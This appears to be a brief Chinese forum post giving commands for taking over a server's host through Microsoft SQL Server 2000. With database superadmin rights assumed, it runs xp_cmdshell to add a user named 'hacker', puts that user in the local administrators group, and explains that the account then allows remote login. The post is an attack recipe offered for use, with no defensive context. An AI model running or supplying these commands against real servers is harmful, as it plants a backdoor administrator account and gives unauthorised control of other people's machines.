通过MSSQL 2000 入侵服务器主机器的命令
首先确保得到数据库超级管理员权限 <br /><br />然后执行如下SQL命令: <br /><br />1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add' <br />2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add' <br /><br /><br /><br />解释: <br /><br />1.通过调用cmdshell 也就是cmd 执行DOS 命令创建hacker用户 <br /><br />2 授权给hacker用户超级管理员权限.. <br /><br />3 这时候您就可以使用创建的帐户去远程登陆这台主机了
頁:
[1]